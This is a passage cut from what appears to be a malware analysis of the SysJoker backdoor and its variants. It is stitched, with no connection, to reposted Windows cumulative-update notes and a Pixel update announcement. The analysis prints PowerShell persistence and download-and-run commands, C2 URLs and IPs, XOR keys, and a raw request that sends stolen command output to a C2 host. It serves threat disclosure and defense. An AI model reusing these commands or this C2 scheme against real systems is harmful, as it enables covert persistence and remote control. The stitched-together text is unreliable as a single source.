    The sample has two modes of operation which are determined by its presence in a particular path. This is intended to differentiate the first execution from any subsequent ones based on persistence.
    First, it checks whether the current running module matches the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe. Based on the outcome the malware proceeds to one of the two possible stages.
    First execution
    If the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe and then runs itself from the newly created path using PowerShell with the following parameter:
    -Command C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe Finally, it creates a persistence mechanism and then exits the program.
    Persistence is established in an unusual way, using PowerShell with the following argument:
    -Command "$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&amp;H80000001','Software\Microsoft\Windows\CurrentVersion\Run', 'php-cgi', 'C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe');" Eventually, this PowerShell code creates a registry Run key in the HKEY_CURRENT_USER hive, which points to the copy of the executable, using the WMI StdRegPro class instead of directly accessing the registry via the Windows API or reg.exe.
    Subsequent executions (from persistence)
    SysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary:
    https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&amp;authkey=!AED7TeCJaC7JNVQ The response must should contain also a XOR-encrypted blob of data that is encoded in base64. During our investigation, the following response was received:
    KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr After decryption, the C2 IP address and port are revealed:
    {"url":"http://85.31.231[.]49:443"} Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services. This behavior remains consistent across different versions of SysJoker.
    The malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. This information is then sent to the /api/attach API endpoint on the C2 server, and in response it receives a unique token that serves as an identifier when the malware communicates with the C2:
    Figure 1 – Bot registration api call. After registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data:
    Figure 2 – Command request and response. The expected response from the server is a JSON that contains a field named data that contains an array of actions for the sample to execute. Each array consists of id and request fields. The request field is another JSON with fields called url and name. An example of the response from the server:
    {"data":[{"id":"1", "request":"{"url": "http://85.31.231[.]49/archive_path", "name":"mal_1.exe"}"}, {"id":"2", "request":"{"url": "http://85.31.231[.]49/archive_path", "name":"mal_2.exe"}"}]} The malware downloads a zip archive from the URL specified in the url field. The archive contains an executable that after unzipping is saved as the name field into C:\ProgramData\php-Win32-libs folder. The archive is unzipped using the following PowerShell command:
    powershell -Command Expand-Archive -Path C:\ProgramData\php-Win32-libs\XMfmF.zip -DestinationPath C:\ProgramData\php-Win32-libs ; start C:\ProgramData\php-Win32-libs\exe_name.exe It is important to mention that in previous SysJoker operations, the malware also had the ability not only to download and execute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, depending on whether the operation was successful or not, the malware contacts the C2 server again and send a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {"status":"success"}.
    Encryption
    The malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption, both blobs are base64-decoded and then XORed to produce the plain text strings.
    The second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample.
    Figure 3 – Example of the decryption of the string “php-”. Windows SysJoker Variants
    In addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a multi-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL.
    DMADevice variant
    The DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered.
    Like other versions, the malware starts by retrieving the C2 server address by contacting the URL: 
    https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&amp;resid=F6A7DCE38A4B8570!115&amp;authkey=AKcf8zLcDneJZHw The OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. This is the same key that is used in the Rust version.
    The decrypted blob contains a JSON with the C2 domain in the following format:
    {"url":"http://sharing-u-file[.]com"} Next, the malware proceeds to the three-stage execution process.
    1. Setup files and persistence
    The sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back the JSON describing the desired malware setup on the infected machine.
    The JSON has the following structure:
    {"key":"f57d611b-0779-4125-a3e8-4f8ca3116509","pi":"VwUD[REDACTED]","data":"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJWAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBrI3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVSV1liVEBGRA5dOWR\/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1DQlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2RuJ2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ=="} The field key in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains the array with multiple values:
    ["SystemDrive","ProgramData","DMADevice","DMASolutionInc","DMASolutionInc.exe","DMASolutionInc.dll","powershell.exe","cmd","open","start","\/c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \/V","\/t REG_SZ \/D",".exe","$env:username | Out-File -Encoding 'utf8' '","SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"] Those values are utilized in the following order:
    SystemDrive – Get the system hard drive letter. ProgramData – Create these two folders under the specified (in this case, ProgramData) folder:
    – DMADevice – The first folder name created.
    – DMASolutionInc.exe – The file name used by the currently running executable to self-replicate into the DMADevice folder. DMASolutionInc.dll – The name of the config file. DMASolutionInc – The second folder name created. The rest of the values are used in a few commands that establish persistence via the registry Run key and retrieve the current user name from $env into the temporary txt file.
    The config file, in our case DMASolutionInc.dll, is stored on a disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields:
    {"id":"[BOT-ID]","us":"[USERNAME]","ip":"[IP]"} After performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits.
    2. Register with the C2 server
    When the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then continues the execution by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware:
    uuid=bot-id&nu=username&user_token=token The server responds with a token generated on its side which is then used for all the subsequent C2 requests.
    3. C2 main loop
    The token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute.
    Similar to other SysJoker variants, the server responds with a JSON that contains field data which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting if it was successful or not.
    AppMessagingRegistrar variant
    This variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666).
    DDN Downloader
    The threat actors first deliver a lightweight downloader. It creates the folder C:\ProgramData\NuGet Library\, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip . It unzips the file, copies it into the AppMessagingRegistrar.exe file and then executes it.
    Splitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines:
    Figure 4 – DNN downloader with 0 detections on its first submission to VT (2023-04-09). AppMessagingRegistratar
    Upon execution, this payload first checks the registry key SOFTWARE\Intel\UNP\ProgramUpdates\UUID for the UUID of the PC. If the registry key is not available, a UUID is generated using the UuidCreate function and is then saved to the previously mentioned key.
    Figure 5 – Uuid Generation. The variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7.
    After the C2 address is decrypted, a POST request is made to the C2 server API endpoint /api/register which contains the previously generated UUID.
    The server responds with a JSON containing a token and a status message: 
    {"status": "success", "token":"[TOKEN]", "status_num":1} The status indicates if the request was valid or not, and the samples check specifically for the string “success”. The token is used for all the following C2 requests but unlike all the other samples, instead of using the body of requests, it is sent in the Authorization header: Authorization: Bearer [TOKEN]. This change could be to accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and requires a mechanism for the server to identify the sender.
    The status_num field is used as a global flag to indicate what actions the bot should take. There are four statuses available:
    Status Number Action Description 0 Setup Download MsoftInit.dll and execute the init and step exports. 1 Idle loop Wait for status_num to change. 3 Payload retrieval Download and save MsoftNotify.dll DLL. 4 Payload execution Execute MsoftNotify.dll DLL. Setup phase
    If the received status_num is 0, the malware creates the C:\ProgramData\Intel\UNP\ProgramUpdates and C:\ProgramData\Intel\Drivers\MsoftUpdates folders. It then proceeds to:
    Download a DLL file using the function UrlDownloadToFileW from the path /api/library/[TOKEN] and save it to C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftInit.dll. Load the MsoftInit.dll and call the init exported function. Load the same DLL again and call the step exported function. The exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and our analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON.
    Idle loop
    If the status_num is 1, the malware continues to make requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change.
    Main payload download
    If the status_num is 3, the malware proceeds to download a DLL file from URL /api/library/[TOKEN] and saves it to the path C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with a status success, the status flag is then set to 4.
    Payload execution
    If the status is 4, the malware proceeds to make a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with 3 parameters, id, r, and k.
    The malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are used by st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the main command running functionality for the backdoor, and its return value should be a string. After the function runs and returns a result, the id received in the token is used in the POST request to the C2 which contains the output:
      POST /api/requests/[ID] HTTP/1.1 Host: [62.108.40.129](https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1) Accept: application/json Authorization: Bearer [TOKEN] Content-Length: 15 Content-Type: application/x-www-form-urlencoded     response=[EXECUTION OUTPUT] Infrastructure
    The infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded.
    This threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.
    Figure 6 – Metadata of OneDrive file containing the encrypted C2 server. Ties to Operation Electric Powder
    The SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:
      $reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run'[TRUNCATED]   This PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of SysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously reported by ClearSky.
    The 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.
    Throughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by different malware when gathering recon data from the infected device to temporary text files:
    Figure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant. Conclusion
    Although the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric Company.
    In our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses.
    The earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it suggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and improvements.
    Check Point Customers Remain Protected
    Check Point Customers remain protected against attacks detailed in this report, while using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation.
    Threat Emulation Backdoor.Wins.Sysjoker.ta.R Backdoor.Wins.Sysjoker.ta.Q Backdoor.Wins.Sysjoker.ta.P Backdoor.Wins.Sysjoker.ta.O Backdoor.Wins.Sysjoker.ta.N Backdoor.Wins.Sysjoker.ta.M Backdoor.Wins.Sysjoker.ta.L Harmony Endpoint Backdoor.Win.SysJoker.H Check Point Anti-Bot Backdoor.WIN32.SysJoker.A Backdoor.WIN32.SysJoker.B Backdoor.WIN32.SysJoker.C IOCs Infrastructure 85.31.231[.]49 sharing-u-file[.]com filestorage-short[.]org audiosound-visual[.]com 62.108.40[.]129    
    Hashes d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72 6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95 e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836 96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f 67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706 0ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba  

    SeedTheNet
    November 14, 2023—KB5032196 (OS Build 17763.5122)
    Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Release Date:
    11/14/2023
    Version:
    OS Build 17763.5122
    11/17/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. 
    Highlights 
    This update supports the currency change in Croatia from the Kuna to the Euro.
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes improvements. When you install this KB: 
    This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022.
    This update affects user mode printer drivers. They unload unexpectedly. This occurs when you print from multiple print queues to the same printer driver.
    This update addresses an issue that affects Xenon or Argon containers. They do not start.
    This update addresses an issue that affects NCryptGetProperty(). Calling it with NCRYPT_KEY_TYPE_PROPERTY returns 0x1 instead of 0x20. This occurs when the key is a machine key.
    This update includes quarterly changes to the Windows Kernel Vulnerable Driver Blocklist file, DriverSiPolicy.p7b. It adds to the list of drivers that are at risk for Bring Your Own Vulnerable Driver (BYOVD) attacks.
    This update addresses an issue that affects Windows LAPS. Its PasswordExpirationProtectionEnabled policy fails to turn on the setting.
    This update addresses an issue that affects an Application Virtualization (App-V) environment. Copy operations within it stop working. This occurs after you install the April 2023 update.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the November 2023 Security Updates.
    Windows 10 servicing stack update - 17763.5084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. 
    Known issues in this update
    Symptom
    Workaround
    Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also pe affected.
    Important This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.
     
    To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured.
    We are working on a resolution and will provide an update in an upcoming release.
     
     
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    Prerequisite:
    You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. 
     
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Windows 10
    Classification: Security Updates
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5032196.
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084. 

    SeedTheNet
    November 14, 2023—KB5032197 (OS Build 14393.6452)
    Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
    11/14/2023
    Version:
    OS Build 14393.6452
    11/19/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of  Windows 10, version 1607, see its update history page.  
    Highlights
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes quality improvements. When you install this KB: 
    This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.  
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the November 2023 Security Updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. 
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Windows 10
    Classification: Security Updates
     
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5032197.
     

    SeedTheNet
    November 14, 2023—KB5032198 (OS Build 20348.2113)
    Windows Server 2022 Release Date:
    14/11/2023
    Version:
    OS Build 20348.2113
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page.     
    Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard.     
    Improvements
    This security update includes quality improvements. When you install this KB:
    This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022.
    This update addresses an issue that affects UI Automation and caching mode.
    This update affects Windows Autopilot profiles. The process to download the Windows Autopilot policy is more resilient. This helps when a network connection might not be fully initialized. This update increases the retry attempts when you try to download the Windows Autopilot profile.  
    This update addresses an issue that causes your device to restart when you do not expect it. This occurs after you restore a system.
    This update affects user mode printer drivers. They unload unexpectedly. This occurs when you print from multiple print queues to the same printer driver.
    This update addresses an issue that affects Xenon or Argon containers. They do not start.
    This update affects Windows Server: Azure Edition. It is easier to view attestation failure notifications.
    This update addresses an issue that affects an Application Virtualization (App-V) environment. Copy operations within it stop working. This occurs after you install the April 2023 update.
    This update addresses an issue that blocks external connections. This occurs when you set up a Kubernetes load balanced service and turn on session affinity.
    This update addresses an issue that affects NCryptGetProperty(). Calling it with NCRYPT_KEY_TYPE_PROPERTY returns 0x1 instead of 0x20. This occurs when the key is a machine key.
    This update includes quarterly changes to the Windows Kernel Vulnerable Driver Blocklist file, DriverSiPolicy.p7b. It adds to the list of drivers that are at risk for Bring Your Own Vulnerable Driver (BYOVD) attacks.
    This update addresses an issue that affects Windows LAPS. Its PasswordExpirationProtectionEnabled policy fails to turn on the setting.
    This update addresses an issue that affects the refsutil.exe inbox utility. Options, like salvage and leak, do not work well on Resilient File System (ReFS) volumes.
    This update addresses an issue that might affect a large reparse point. You might get a stop error when you use NTFS to access it. This issue occurs after a canceled FSCTL Set operation changes the reparse tag.
    This update addresses an issue that affects a machine that is used as a remote desktop session (RDS) host. An RDR_FILE_SYSTEM (0x27) stop error occurs. Because of this, everyone that uses RDS starts up from this machine.
    This update addresses a known issue that affects virtual machines (VMs) that run on VMware ESXi hosts. Windows Server 2022 might fail to start up. The affected VMs will receive an error with a blue screen and a stop code: PNP DETECTED FATAL ERROR.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the Security Update Guide and the November 2023 Security Updates.
    Windows Server 2022 servicing stack update - 20348.2084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
     
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Microsoft Server operating system-21H2
    Classification: Security Updates
     
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File Information
    For a list of the files that are provided in this update, download the file information for cumulative update 5032198. 
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2084. 

    SeedTheNet
    Google Pixel Update - Dec 2023
    Hello Pixel Community,   We have provided the monthly software update for December 2023. All supported Pixel devices running Android 14 will receive these software updates starting today. The rollout will continue over the next week in phases depending on carrier and device. Users will receive a notification once the OTA is available for their device. We encourage you to check your Android version and update to receive the latest software.    Details of this month’s security fixes can be found on the Android Security Bulletin: https://source.android.com/security/bulletin   Thanks, Google Pixel Support Team  
    Software versions   Global Pixel 5a (5G):    UQ1A.231205.014 Pixel 6:                UQ1A.231205.015 Pixel 6 Pro:        UQ1A.231205.015 Pixel 6a:              UQ1A.231205.015 Pixel 7:                UQ1A.231205.015 Pixel 7 Pro:        UQ1A.231205.015 Pixel 7a:              UQ1A.231205.015 Pixel Tablet:       UQ1A.231205.015 Pixel Fold:           UQ1A.231205.015 Pixel 8:                UQ1A.231205.015 Pixel 8 Pro:        UQ1A.231205.015   Verizon Pixel 7:                UQ1A.231205.015.A1 Pixel 7 Pro:         UQ1A.231205.015.A1 Pixel 7a:              UQ1A.231205.015.A1 Pixel Fold:           UQ1A.231205.015.A1 Pixel 8:                UQ1A.231205.015.A1 Pixel 8 Pro:        UQ1A.231205.015.A1   What’s included   The December 2023 update includes bug fixes and improvements for Pixel users – see below for details.   Apps General improvements for stability or performance with certain system apps *[1]   Audio Fix for users facing issues in pairing Hearing aid with phone during calls under certain conditions   Battery & Charging General improvements for charging and battery usage *[2]   Biometrics Fix for fingerprint issues on first attempt when always-on display is enabled under certain conditions *[3]   Bluetooth Fix for issue causing Bluetooth discovery to stop functioning under certain conditions Fix for issue causing Bluetooth to stop functioning under certain conditions   Camera General improvements for camera stability under certain conditions   Display & Graphics Fix for issue causing emoji icons to be rendered brighter than the rest of the adjacent content *[1] Fix for issue causing visual artifacts while scrolling on the home screen under certain conditions *[1] Fix for users getting a green flash when using the phone in certain conditions General improvements to display stability   Framework General improvements for system stability and performance in certain conditions   Location & GPS Fix for issue causing GPS instability under certain conditions   Sensors Fix for Phone vibrating continuously in certain conditions *[3]   System Fix for issue causing third party apps to crash on start up in certain conditions Fix for issue with Battery charging notifications in certain conditions   Telephony Fix for Voice over Wi-Fi calls to fail in certain conditions General improvements for network connection stability and performance in certain conditions   User Interface Fix for black bar at the bottom of the display after changing screen saver in certain conditions *[4] Fix for black screen in certain conditions *[1] Fix for certain users unable to share Videos/Screenshots/Documents in certain conditions *[4] Fix for custom clock reset to default in certain conditions Fix for email notification overlays that are not removed in certain conditions Fix for empty home screen post unlocking via fingerprint in certain conditions Fix for home screen blank background post unlocking in certain conditions *[4] Fix for incorrect date/time showing in status bar in certain conditions Fix for issue causing quick settings tiles to not activate under certain conditions Fix for issue causing the clock and temperature to overlap on the At a Glance lockscreen Fix for issue with blank notifications in certain conditions Fix for messages SMS Icon not showing in certain conditions Fix for missing icons post unlocking via fingerprint in certain conditions Fix for missing mobile icons in certain conditions when multiple SIMs are used Fix for unable to unlock device in certain conditions *[5] Fix for Wallpaper on home screen showing black in certain conditions Fix for Wi-Fi icon not displaying in certain conditions General improvement to the setup wizard flow pertaining to the navigation mode selection *[1] General improvements for performance and Memory management in certain UI transitions General improvements for performance and stability in certain UI transitions and animations General improvements for system stability and performance in certain conditions   Wi-Fi General improvements for Wi-Fi stability and performance in certain conditions   ---------------------------------------------------------------   Device Applicability   Fixes are available for all supported Pixel devices unless otherwise indicated below.   *[1] Pixel 8 Pro, Pixel 8 *[2] Pixel 8 Pro, Pixel 8, Pixel Fold, Pixel Tablet *[3] Pixel 6, Pixel 6 Pro, Pixel 6a, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel Fold, Pixel 8, Pixel 8 Pro *[4] Pixel Fold, Pixel Tablet *[5] Pixel 6, Pixel 6 Pro, Pixel 6a, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel 8, Pixel 8 Pro

    SeedTheNet
    October 10, 2023—KB5031361 (OS Build 17763.4974)
    Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Less Release Date:
    10/10/2023
    Version:
    OS Build 17763.4974
    11/17/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. 
    Highlights 
    This update supports daylight saving time (DST) changes in Greenland.
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes improvements. When you install this KB: 
    New! This update completes the work to comply with the GB18030-2022 requirements. It removes and remaps characters for Microsoft Wubi input and Microsoft Pinyin U-mode input. You can no longer enter character codepoints that are not supported. All the required codepoints are up to date.
    New! This update adds Azure Arc Optional Component related links to Server Manager. Now, you can turn on Arc on your servers. You do not need to run a PowerShell script.
    This update changes the spelling of Ukraine's capital from Kiev to Kyiv.
    This update addresses an issue that affects scheduled tasks. Tasks that call the credential manager API might fail. This occurs if you select [Run only when user is logged on] and [Run with highest privileges].
    This update addresses an issue that stops you from getting the IE mode windows list.
    This update addresses an issue that affects external binding. It fails. This occurs after you install Windows updates dated May 2023 or later. Because of this, there are issues that affect LDAP queries and authentication.
    This update addresses an issue that affects those who enable the “Smart Card is Required for Interactive Logon” account option. When RC4 is disabled, you cannot authenticate to Remote Desktop Services farms. The error message is, "An authentication error has occurred. The requested encryption type is not supported by the KDC.”
    This update addresses an issue that affects Kerberos delegation. It might fail in the wrong way. The error code is 0xC000006E (STATUS_ACCOUNT_RESTRICTION). This issue might occur when you mark the intermediate service account as “This account is sensitive and cannot be delegated” in Active Directory. Applications might also return the error message, “System.Security.Authentication.AuthenticationException: Failed to initialize security context. Error code was -2146893042.”
    This update affects Windows Filtering Platform (WFP) connections. The redirect diagnostics for them has improved.
    This update addresses an issue that affects a relying party. When you sign out of it, a SAML request cookie is not cleared. Because of this, your device automatically attempts to connect to the same relying party when you sign in again.
    This update addresses an issue that affects the Server Message Block (SMB) client. It does not reconnect all the persistent handles when the reauthentication of a session fails.
    To protect against CVE-2023-44487, you should install the latest Windows update. Based on your use case, you can also set the limit of the RST_STREAMS per minute using the new registry key in this update.
    Registry key
    Default value
    Valid value range
    Registry key function
    Http2MaxClientResetsPerMinute
    500
    0–65535
